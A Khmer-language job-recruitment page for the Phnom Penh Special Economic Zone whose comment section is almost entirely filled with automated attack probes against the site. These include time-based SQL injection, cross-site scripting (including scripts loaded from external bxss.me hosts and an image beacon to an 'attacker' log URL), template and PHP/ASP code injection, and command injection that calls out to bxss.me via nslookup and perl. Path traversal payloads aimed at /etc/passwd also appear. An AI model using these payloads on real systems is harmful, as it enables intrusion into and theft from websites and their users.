ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

តំបន់សេដ្ឋកិច្ចពិសេសភ្នំពេញ

តំបន់សេដ្ឋកិច្ចពិសេសភ្នំពេញ គឺជាតំបន់ឧស្សាហកម្មដែលប្រមូលផ្តុំទៅដោយរោងចក្រសហគ្រាសអន្តរជាតិធំៗជាច្រើន ហើយអាចផ្តល់នូវឱកាសការងារល្អៗដល់ប្រជាជនខ្មែររាប់ម៉ឺននាក់ សំរាប់ការងារក្នុងស្រុកប៉ុណ្ណោះ។

បច្ចុប្បន្នតំបន់សេដ្ឋកិច្ចពិសេសភ្នំពេញមានកម្មករ២ម៉ឺននាក់ជាង ៕


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 64

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 2024 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 07:54:28


  @@J6w18


 • pHqghUme

  2021-05-06 07:54:23


  1'"


 • pHqghUme

  2021-05-06 07:54:21


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 07:53:56


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 07:53:30


  LxGq9o8u')) OR 128=(SELECT 128 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:53:05


  GjFneW51') OR 859=(SELECT 859 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:49


  PKS4rnjD' OR 789=(SELECT 789 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:34


  -1)) OR 554=(SELECT 554 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:21


  -5) OR 910=(SELECT 910 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:05


  -5 OR 63=(SELECT 63 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:51:50


  bElkHIGR'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:33


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:16


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:01


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:50:44


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 07:50:25


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 07:50:06


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 07:49:49


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 07:49:34


  -1" OR 2+564-564-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:49:33


  -1' OR 2+218-218-1=0+0+0+1 or 'OtBbbVoN'='


 • pHqghUme

  2021-05-06 07:49:32


  -1' OR 2+433-433-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:49:31


  -1 OR 2+705-705-1=0+0+0+1


 • pHqghUme

  2021-05-06 07:49:30


  -1 OR 2+666-666-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:49:29


  N8d0dDSI


 • pHqghUme

  2021-05-06 07:48:58


  1


 • pHqghUme

  2021-05-06 07:48:34


  1


 • @@1ysOA

  2021-05-06 07:48:11


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:48:07


  1


 • 1'"

  2021-05-06 07:48:07


  1


 • jRVyynD2')) OR 500=(SELECT 500 FROM PG_SLEEP(15))--

  2021-05-06 07:47:43


  1


 • 42HP5lgS') OR 557=(SELECT 557 FROM PG_SLEEP(15))--

  2021-05-06 07:46:54


  1


 • lqo8lCXc' OR 65=(SELECT 65 FROM PG_SLEEP(15))--

  2021-05-06 07:46:13


  1


 • M87ba1ft'; waitfor delay '0:0:15' --

  2021-05-06 07:45:37


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:45:10


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:44:44


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:44:24


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:44:02


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:43:44


  1


 • -1" OR 2+62-62-1=0+0+0+1 --

  2021-05-06 07:43:23


  1


 • -1' OR 2+362-362-1=0+0+0+1 or 'YaJ79rAO'='

  2021-05-06 07:43:22


  1


 • -1' OR 2+669-669-1=0+0+0+1 --

  2021-05-06 07:43:21


  1


 • -1 OR 2+898-898-1=0+0+0+1

  2021-05-06 07:43:20


  1


 • -1 OR 2+933-933-1=0+0+0+1 --

  2021-05-06 07:43:19


  1


 • vqWjDy4e

  2021-05-06 07:43:18


  1


 • pHqghUme

  2021-05-06 07:42:55


  1


 • pHqghUme

  2021-05-06 07:42:30


  1


 • pHqghUme

  2021-05-06 07:42:04


  1


 • pHqghUme

  2021-05-06 07:42:00


  1


 • pHqghUme

  2021-05-06 07:41:59


  1


 • pHqghUme

  2021-05-06 07:41:27


  1


 • pHqghUme

  2021-05-06 07:40:56


  1


 • pHqghUme

  2021-05-06 07:40:25


  1<HQR6uA<


 • pHqghUme

  2021-05-06 07:40:24


  1


 • pHqghUme

  2021-05-06 07:40:17


  1<img sRc='http://attacker-9974/log.php?


 • pHqghUme

  2021-05-06 07:40:11


  1<8ShNTk x=9069>


 • pHqghUme

  2021-05-06 07:40:05


  1<ifRAme sRc=9095.com></IfRamE>


 • pHqghUme

  2021-05-06 07:40:00


  1<W0VQID>VRMMN[!+!]</W0VQID>


 • pHqghUme

  2021-05-06 07:39:56


  10G1aR <ScRiPt >pyIv(9880)</ScRiPt>


 • pHqghUme

  2021-05-06 07:39:53


  1<% contenteditable onresize=pyIv(9185)>


 • pHqghUme

  2021-05-06 07:39:49


  1}body{acu:Expre/**/SSion(pyIv(9686))}


 • pHqghUme

  2021-05-06 07:39:45


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:39:41


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:39:37


  1<input autofocus onfocus=pyIv(9341)>


 • pHqghUme

  2021-05-06 07:39:30


  1&lt;ScRiPt&gt;pyIv(9297)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:39:28


  1


 • pHqghUme

  2021-05-06 07:39:25


  1\u003CScRiPt\pyIv(9707)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:39:21


  %31%3C%53%63%52%69%50%74%20%3E%70%79%49%76%289518%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:39:16


  1<img/src=">" onerror=alert(9952)>


 • pHqghUme

  2021-05-06 07:39:10


  1<img src=xyz OnErRor=pyIv(9445)>


 • pHqghUme

  2021-05-06 07:39:07


  1


 • pHqghUme

  2021-05-06 07:39:06


  1<img src=//xss.bxss.me/t/dot.gif onload=pyIv(9047)>


 • pHqghUme

  2021-05-06 07:39:00


  1<body onload=pyIv(9938)>


 • pHqghUme

  2021-05-06 07:38:56


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9751'>


 • pHqghUme

  2021-05-06 07:38:50


  1<isindex type=image src=1 onerror=pyIv(9332)>


 • pHqghUme

  2021-05-06 07:38:45


  1


 • pHqghUme

  2021-05-06 07:38:43


  1<ScRiPt >pyIv(9803)</ScRiPt>


 • pHqghUme

  2021-05-06 07:38:39


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9783></ScRiPt>


 • pHqghUme

  2021-05-06 07:38:33


  1<ScRiPt >pyIv(9890)</ScRiPt>


 • pHqghUme

  2021-05-06 07:38:28


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%70%79%49%76%28%39%33%31%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:38:23


  1


 • pHqghUme

  2021-05-06 07:38:22


  1<script>pyIv(9204)</script>


 • pHqghUme

  2021-05-06 07:38:18


  1<W1L36N>PZM1Y[!+!]</W1L36N>


 • pHqghUme

  2021-05-06 07:38:13


  1<ScRiPt >pyIv(9581)</ScRiPt>


 • pHqghUme

  2021-05-06 07:38:08


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:38:04


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:37:59


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:37:58


  1


 • pHqghUme

  2021-05-06 07:37:54


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:37:48


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:37:39


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:37:33


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:37:33


  1


 • pHqghUme

  2021-05-06 07:37:21


  acux1910%C0%BEz1%C0%BCz2a%90bcxuca1910


 • pHqghUme

  2021-05-06 07:37:14


  acu8697%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8697


 • pHqghUme

  2021-05-06 07:37:09


  1


 • pHqghUme

  2021-05-06 07:37:07


  19569283


 • pHqghUme

  2021-05-06 07:37:07


  1


 • pHqghUme

  2021-05-06 07:37:06


  1


 • pHqghUme

  2021-05-06 07:37:05


  1


 • pHqghUme

  2021-05-06 07:37:05


  1


 • pHqghUme

  2021-05-06 07:37:03


  1


 • pHqghUme

  2021-05-06 07:36:58


  '"()&%<acx><ScRiPt >pyIv(9052)</ScRiPt>


 • pHqghUme

  2021-05-06 07:36:50


  1'"()&%<acx><ScRiPt >pyIv(9895)</ScRiPt>


 • pHqghUme<znFeI3<

  2021-05-06 07:36:46


  1


 • pHqghUme

  2021-05-06 07:36:45


  1


 • pHqghUme<img sRc='http://attacker-9346/log.php?

  2021-05-06 07:36:40


  1


 • pHqghUme<gRd3KE x=9514>

  2021-05-06 07:36:30


  1


 • pHqghUme

  2021-05-06 07:36:27


  1


 • pHqghUme<ifRAme sRc=9802.com></IfRamE>

  2021-05-06 07:36:24


  1


 • pHqghUme<WRYC2X>8GRE8[!+!]</WRYC2X>

  2021-05-06 07:36:17


  1


 • pHqghUmemfCDB <ScRiPt >pyIv(9241)</ScRiPt>

  2021-05-06 07:36:08


  1


 • pHqghUme

  2021-05-06 07:36:02


  1


 • pHqghUme<% contenteditable onresize=pyIv(9803)>

  2021-05-06 07:35:59


  1


 • pHqghUme

  2021-05-06 07:35:55


  1


 • pHqghUme

  2021-05-06 07:35:51


  1


 • pHqghUme}body{acu:Expre/**/SSion(pyIv(9195))}

  2021-05-06 07:35:47


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:35:34


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:35:25


  1


 • pHqghUme<input autofocus onfocus=pyIv(9528)>

  2021-05-06 07:35:15


  1


 • pHqghUme

  2021-05-06 07:35:02


  1


 • pHqghUme&lt;ScRiPt&gt;pyIv(9574)&lt;/sCripT&gt;

  2021-05-06 07:34:54


  1


 • pHqghUme\u003CScRiPt\pyIv(9266)\u003C/sCripT\u003E

  2021-05-06 07:34:38


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%70%79%49%76%289196%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:34:23


  1


 • pHqghUme<img/src=">" onerror=alert(9278)>

  2021-05-06 07:34:11


  1


 • pHqghUme

  2021-05-06 07:34:07


  1


 • pHqghUme<img src=xyz OnErRor=pyIv(9531)>

  2021-05-06 07:34:03


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=pyIv(9202)>

  2021-05-06 07:33:58


  1


 • pHqghUme<body onload=pyIv(9753)>

  2021-05-06 07:33:52


  1


 • pHqghUme

  2021-05-06 07:33:47


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9429'>

  2021-05-06 07:33:46


  1


 • pHqghUme<isindex type=image src=1 onerror=pyIv(9237)>

  2021-05-06 07:33:40


  1


 • pHqghUme<ScRiPt >pyIv(9476)</ScRiPt>

  2021-05-06 07:33:29


  1


 • pHqghUme

  2021-05-06 07:33:29


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9975></ScRiPt>

  2021-05-06 07:33:20


  1


 • pHqghUme<ScRiPt >pyIv(9352)</ScRiPt>

  2021-05-06 07:33:12


  1


 • pHqghUme

  2021-05-06 07:33:06


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%70%79%49%76%28%39%31%31%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:33:05


  1


 • pHqghUme<script>pyIv(9715)</script>

  2021-05-06 07:32:59


  1


 • pHqghUme<WIP5O7>LBGA1[!+!]</WIP5O7>

  2021-05-06 07:32:52


  1


 • pHqghUme

  2021-05-06 07:32:46


  1


 • pHqghUme<ScRiPt >pyIv(9677)</ScRiPt>

  2021-05-06 07:32:46


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:32:41


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:32:34


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:32:28


  1


 • pHqghUme

  2021-05-06 07:32:24


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:32:22


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:32:16


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:32:10


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:32:04


  1


 • pHqghUme

  2021-05-06 07:32:04


  1


 • acux7642%C0%BEz1%C0%BCz2a%90bcxuca7642

  2021-05-06 07:31:58


  1


 • acu2533%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2533

  2021-05-06 07:31:53


  1


 • pHqghUme

  2021-05-06 07:31:45


  1


 • pHqghUme9407683

  2021-05-06 07:31:45


  1


 • '"()&%<acx><ScRiPt >pyIv(9154)</ScRiPt>

  2021-05-06 07:31:38


  1


 • pHqghUme'"()&%<acx><ScRiPt >pyIv(9492)</ScRiPt>

  2021-05-06 07:31:31


  1


 • pHqghUme

  2021-05-06 07:31:26


  1


 • pHqghUme

  2021-05-06 07:31:24


  1


 • pHqghUme

  2021-05-06 07:31:23


  1


 • pHqghUme

  2021-05-06 07:31:23


  1


 • pHqghUme

  2021-05-06 07:31:22


  1


 • pHqghUme

  2021-05-06 07:31:21


  1


 • pHqghUme

  2021-05-06 07:31:20


  1


 • pHqghUme

  2021-05-06 07:31:17


  1


 • pHqghUme

  2021-05-06 07:31:11


  1


 • pHqghUme

  2021-05-06 07:31:05


  1


 • pHqghUme

  2021-05-06 07:31:02


  1


 • pHqghUme

  2021-05-06 07:31:00


  1


 • pHqghUme

  2021-05-06 07:30:57


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:30:56


  1


 • pHqghUme

  2021-05-06 07:30:46


  1


 • pHqghUme

  2021-05-06 07:30:46


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:30:46


  1


 • pHqghUme

  2021-05-06 07:30:45


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:30:45


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:30:45


  1


 • pHqghUme

  2021-05-06 07:30:40


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:30:40


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:30:39


  '"


 • pHqghUme

  2021-05-06 07:30:39


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 07:30:39


  <!--


 • <!--

  2021-05-06 07:30:38


  1


 • '.print(md5(31337)).'

  2021-05-06 07:30:38


  1


 • '"

  2021-05-06 07:30:37


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:30:37


  1


 • pHqghUme

  2021-05-06 07:30:36


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:30:36


  1


 • pHqghUme

  2021-05-06 07:30:36


  `(nslookup hitqtlvqhvvdw5fda3.bxss.me||perl -e "gethostbyname('hitqtlvqhvvdw5fda3.bxss.me')")`


 • pHqghUme

  2021-05-06 07:30:36


  1


 • ${@print(md5(31337))}

  2021-05-06 07:30:36


  1


 • ';print(md5(31337));$a='

  2021-05-06 07:30:35


  1


 • pHqghUme

  2021-05-06 07:30:35


  1


 • pHqghUme

  2021-05-06 07:30:35


  |(nslookup hitvyvmfvnbeda839f.bxss.me||perl -e "gethostbyname('hitvyvmfvnbeda839f.bxss.me')")


 • pHqghUme

  2021-05-06 07:30:34


  1


 • pHqghUme

  2021-05-06 07:30:34


  /xfs.bxss.me


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:30:34


  1


 • pHqghUme

  2021-05-06 07:30:34


  1


 • pHqghUme

  2021-05-06 07:30:33


  1


 • pHqghUme

  2021-05-06 07:30:33


  1


 • /xfs.bxss.me

  2021-05-06 07:30:33


  1


 • pHqghUme

  2021-05-06 07:30:32


  1


 • pHqghUme

  2021-05-06 07:30:32


  1


 • pHqghUme

  2021-05-06 07:30:32


  1


 • pHqghUme

  2021-05-06 07:30:32


  1


 • pHqghUme

  2021-05-06 07:30:31


  1


 • pHqghUme

  2021-05-06 07:30:31


  '+'A'.concat(70-3).concat(22*4).concat(111).concat(79).concat(114).concat(72)+(require'socket' Socket.gethostbyname('hituq'+'wfiaxfns6e93c.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:30:30


  1


 • '+'A'.concat(70-3).concat(22*4).concat(115).concat(75).concat(97).concat(66)+(require'socket' Socket.gethostbyname('hitiu'+'abjmgabj31859.bxss.me.')[3].to_s)+'

  2021-05-06 07:30:30


  1


 • pHqghUme

  2021-05-06 07:30:30


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:30:30


  1


 • pHqghUme

  2021-05-06 07:30:30


  "+"A".concat(70-3).concat(22*4).concat(122).concat(73).concat(103).concat(84)+(require"socket" Socket.gethostbyname("hitjz"+"jrxuukte71627.bxss.me.")[3].to_s)+"


 • bxss.me/t/xss.html?%00

  2021-05-06 07:30:29


  1


 • pHqghUme

  2021-05-06 07:30:29


  1


 • "+"A".concat(70-3).concat(22*4).concat(98).concat(82).concat(109).concat(72)+(require"socket" Socket.gethostbyname("hitcq"+"etvzbrac54615.bxss.me.")[3].to_s)+"

  2021-05-06 07:30:29


  1


 • pHqghUme

  2021-05-06 07:30:29


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:30:28


  1


 • pHqghUme

  2021-05-06 07:30:28


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:30:28


  1


 • pHqghUme

  2021-05-06 07:30:28


  1


 • pHqghUme

  2021-05-06 07:30:28


  1


 • pHqghUme

  2021-05-06 07:30:27


  1


 • pHqghUme

  2021-05-06 07:30:27


  1


 • pHqghUme

  2021-05-06 07:30:27


  1


 • pHqghUme

  2021-05-06 07:30:27


  1


 • pHqghUme

  2021-05-06 07:30:27


  1


 • pHqghUme

  2021-05-06 07:30:26


  1


 • pHqghUme

  2021-05-06 07:30:26


  1


 • pHqghUme

  2021-05-06 07:30:26


  1


 • pHqghUme

  2021-05-06 07:30:25


  (nslookup hitpwtidwhrlxfce17.bxss.me||perl -e "gethostbyname('hitpwtidwhrlxfce17.bxss.me')")


 • pHqghUme

  2021-05-06 07:30:25


  $(nslookup hitdqqfhxfdmtab0f6.bxss.me||perl -e "gethostbyname('hitdqqfhxfdmtab0f6.bxss.me')")


 • pHqghUme

  2021-05-06 07:30:24


  |echo qrqgwh$()\ sjviii\nz^xyu||a #' |echo qrqgwh$()\ sjviii\nz^xyu||a #|" |echo qrqgwh$()\ sjviii\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:30:22


  '"()


 • pHqghUme

  2021-05-06 07:30:22


  &echo whiysq$()\ ugjdxb\nz^xyu||a #' &echo whiysq$()\ ugjdxb\nz^xyu||a #|" &echo whiysq$()\ ugjdxb\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:30:21


  echo tsiapn$()\ wvevfi\nz^xyu||a #' &echo tsiapn$()\ wvevfi\nz^xyu||a #|" &echo tsiapn$()\ wvevfi\nz^xyu||a #


 • '"()

  2021-05-06 07:30:19


  1


 • pHqghUme

  2021-05-06 07:30:18


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 07:30:18


  ".gethostbyname(lc("hitol"."eyrgymgqbe2ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(75).chr(119).chr(86)."


 • `(nslookup hitufrfgtddjfca819.bxss.me||perl -e "gethostbyname('hitufrfgtddjfca819.bxss.me')")`

  2021-05-06 07:30:18


  1


 • ".gethostbyname(lc("hitvt"."qxugyhuabbcb8.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(90).chr(106).chr(89)."

  2021-05-06 07:30:17


  1


 • |(nslookup hitchqfcgfbybfd66b.bxss.me||perl -e "gethostbyname('hitchqfcgfbybfd66b.bxss.me')")

  2021-05-06 07:30:17


  1


 • pHqghUme

  2021-05-06 07:30:17


  '.gethostbyname(lc('hitmg'.'fbqdhzwk63c4a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(86).chr(97).chr(71).'


 • '.gethostbyname(lc('hitjl'.'gtoycolo70a28.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(88).chr(121).chr(82).'

  2021-05-06 07:30:16


  1


 • pHqghUme

  2021-05-06 07:30:16


  1


 • pHqghUme

  2021-05-06 07:30:15


  1


 • pHqghUme

  2021-05-06 07:30:15


  1


 • pHqghUme

  2021-05-06 07:30:14


  1


 • pHqghUme

  2021-05-06 07:30:14


  1


 • pHqghUme

  2021-05-06 07:30:12


  1&n954145=v912341


 • pHqghUme

  2021-05-06 07:30:12


  1


 • (nslookup hitpybwtwwoqn24744.bxss.me||perl -e "gethostbyname('hitpybwtwwoqn24744.bxss.me')")

  2021-05-06 07:30:11


  1


 • $(nslookup hitqrnsjgqnhe8ee44.bxss.me||perl -e "gethostbyname('hitqrnsjgqnhe8ee44.bxss.me')")

  2021-05-06 07:30:11


  1


 • pHqghUme

  2021-05-06 07:30:10


  bxss.me


 • |echo hysezn$()\ fanwsn\nz^xyu||a #' |echo hysezn$()\ fanwsn\nz^xyu||a #|" |echo hysezn$()\ fanwsn\nz^xyu||a #

  2021-05-06 07:30:10


  1


 • pHqghUme

  2021-05-06 07:30:09


  http://bxss.me/t/fit.txt%3F.jpg


 • &echo osgzap$()\ cxtlak\nz^xyu||a #' &echo osgzap$()\ cxtlak\nz^xyu||a #|" &echo osgzap$()\ cxtlak\nz^xyu||a #

  2021-05-06 07:30:09


  1


 • pHqghUme

  2021-05-06 07:30:08


  Http://bxss.me/t/fit.txt


 • echo ctnuiz$()\ gfrydo\nz^xyu||a #' &echo ctnuiz$()\ gfrydo\nz^xyu||a #|" &echo ctnuiz$()\ gfrydo\nz^xyu||a #

  2021-05-06 07:30:08


  1


 • pHqghUme

  2021-05-06 07:30:07


  ^(#$!@#$)(()))******


 • pHqghUme&n952815=v907584

  2021-05-06 07:30:07


  1


 • pHqghUme

  2021-05-06 07:30:07


  1some_inexistent_file_with_long_name%00.jpg


 • bxss.me

  2021-05-06 07:30:06


  1


 • pHqghUme

  2021-05-06 07:30:06


  )


 • pHqghUme

  2021-05-06 07:30:06


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 07:30:06


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • ^(#$!@#$)(()))******

  2021-05-06 07:30:05


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:30:05


  1


 • pHqghUme

  2021-05-06 07:30:05


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:30:04


  1


 • pHqghUme

  2021-05-06 07:30:04


  1


 • !(()&&!|*|*|

  2021-05-06 07:30:02


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:30:01


  1


 • )

  2021-05-06 07:30:01


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:30:01


  1


 • pHqghUme

  2021-05-06 07:30:00


  1


 • pHqghUme

  2021-05-06 07:30:00


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:30:00


  1


 • pHqghUme

  2021-05-06 07:29:59


  1


 • pHqghUme

  2021-05-06 07:29:59


  1


 • pHqghUme

  2021-05-06 07:29:58


  1


 • pHqghUme

  2021-05-06 07:29:58


  1


 • pHqghUme

  2021-05-06 07:29:58


  1


 • pHqghUme

  2021-05-06 07:29:58


  1


 • pHqghUme

  2021-05-06 07:29:57


  1


 • pHqghUme

  2021-05-06 07:29:57


  1


 • pHqghUme

  2021-05-06 07:29:57


  1


 • pHqghUme

  2021-05-06 07:29:56


  1


 • pHqghUme

  2021-05-06 07:29:56


  1


 • pHqghUme

  2021-05-06 07:29:56


  1


 • pHqghUme

  2021-05-06 07:29:55


  1


 • pHqghUme

  2021-05-06 07:29:55


  1


 • pHqghUme

  2021-05-06 07:29:54


  1


 • pHqghUme

  2021-05-06 07:29:54


  1


 • pHqghUme

  2021-05-06 07:29:54


  1


 • pHqghUme

  2021-05-06 07:29:53


  1


 • pHqghUme

  2021-05-06 07:29:53


  1


 • pHqghUme

  2021-05-06 07:29:52


  1


 • pHqghUme

  2021-05-06 07:29:52


  1


 • pHqghUme

  2021-05-06 07:29:51


  1


 • pHqghUme

  2021-05-06 07:29:50


  ../1


 • pHqghUme

  2021-05-06 07:29:49


  1


 • bTdEVkV3RWI=

  2021-05-06 07:29:49


  1


 • pHqghUme

  2021-05-06 07:29:48


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:29:47


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:29:47


  1


 • pHqghUme

  2021-05-06 07:29:46


  1


 • ../pHqghUme

  2021-05-06 07:29:46


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:29:45


  1


 • pHqghUme

  2021-05-06 07:29:45


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:29:44


  1


 • pHqghUme

  2021-05-06 07:29:43


  ${9999163+9999964}


 • pHqghUme

  2021-05-06 07:29:43


  1


 • pHqghUme

  2021-05-06 07:29:42


  1


 • ${10000022+10000364}

  2021-05-06 07:29:42


  1


 • pHqghUme

  2021-05-06 07:29:42


  1


 • pHqghUme

  2021-05-06 07:29:41


  1


 • pHqghUme

  2021-05-06 07:29:41


  1


 • pHqghUme

  2021-05-06 07:29:41


  1


 • pHqghUme

  2021-05-06 07:29:41


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:29:40


  1


 • pHqghUme

  2021-05-06 07:29:40


  1


 • pHqghUme

  2021-05-06 07:29:40


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:29:40


  1


 • pHqghUme

  2021-05-06 07:29:39


  1


 • pHqghUme

  2021-05-06 07:29:39


  1


 • pHqghUme

  2021-05-06 07:29:38


  1


 • pHqghUme

  2021-05-06 07:29:38


  1


 • pHqghUme

  2021-05-06 07:29:37


  1


 • pHqghUme

  2021-05-06 07:29:37


  1


 • pHqghUme

  2021-05-06 07:29:37


  1


 • pHqghUme

  2021-05-06 07:29:36


  "+response.write(9119014*9175893)+"


 • pHqghUme

  2021-05-06 07:29:35


  1


 • pHqghUme

  2021-05-06 07:29:35


  1


 • pHqghUme

  2021-05-06 07:29:34


  1


 • pHqghUme

  2021-05-06 07:29:34


  '+response.write(9119014*9175893)+'


 • pHqghUme

  2021-05-06 07:29:33


  response.write(9119014*9175893)


 • pHqghUme

  2021-05-06 07:29:32


  1


 • "+response.write(9812600*9811991)+"

  2021-05-06 07:29:32


  1


 • '+response.write(9812600*9811991)+'

  2021-05-06 07:29:31


  1


 • response.write(9812600*9811991)

  2021-05-06 07:29:29


  1


 • pHqghUme

  2021-05-06 07:29:27


  1


 • pHqghUme

  2021-05-06 07:29:25


  ZTSSRDUg


 • pHqghUme

  2021-05-06 07:29:25


  1


 • pHqghUme

  2021-05-06 07:29:24


  1


 • Dts7itEi

  2021-05-06 07:29:23


  1


 • pHqghUme

  2021-05-06 07:29:23


  1


